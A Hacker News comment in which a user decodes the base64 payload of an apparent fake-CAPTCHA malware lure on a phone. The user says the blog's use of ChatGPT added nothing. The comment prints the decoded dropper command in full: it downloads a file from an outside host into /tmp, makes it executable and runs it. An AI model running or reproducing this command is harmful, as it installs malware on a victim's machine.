|
|
|
|
|
|
by dingnuts
240 days ago
|
|
|
It's a bad idea to try to execute a malicious string in any environment, but the payload is just base64 text and it's safe to decode if you understand how to use the command line. Look, I just deciphered it in Termux on my phone: ~ $ echo "Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS" | base64 -d curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR~ $ Did ChatGPT do ANYTHING useful in this blog? No, but it probably cost more than it did when I ran base64 -d on my phone lol and if you want updoots on the Orange Site you had better mention LLMs If I was more paranoid I could've used someone else's computer to decipher the text but I wanted to make a point. |
|
|